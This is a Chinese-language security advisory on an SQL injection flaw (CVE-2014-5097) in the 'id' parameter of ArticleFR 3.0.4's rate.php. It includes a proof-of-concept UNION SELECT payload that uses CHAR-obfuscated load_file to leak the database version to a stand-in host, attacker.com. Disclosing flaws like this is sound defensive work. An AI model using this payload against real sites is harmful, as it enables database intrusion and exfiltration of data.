发布日期:2014-08-20
更新日期:2014-08-25
受影响系统:
freereprintables ArticleFR 3.0.4
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 69307
CVE(CAN) ID: CVE-2014-5097
ArticleFR是自由文章目录CMS系统。
ArticleFR 3.0.4及其他版本没有有效过滤"/rate.php"脚本的"id" HTTP GET参数值,远程攻击者通过精心构造的HTTP GET请求利用此漏洞在应用的数据库内执行SQL命令。
<*来源:High-Tech Bridge Security Research Lab
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
?act=get&amp;id=0%20union%20select%201,(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHA R(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(1 11),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))%20--%202
建议:
--------------------------------------------------------------------------------
厂商补丁:
freereprintables
----------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: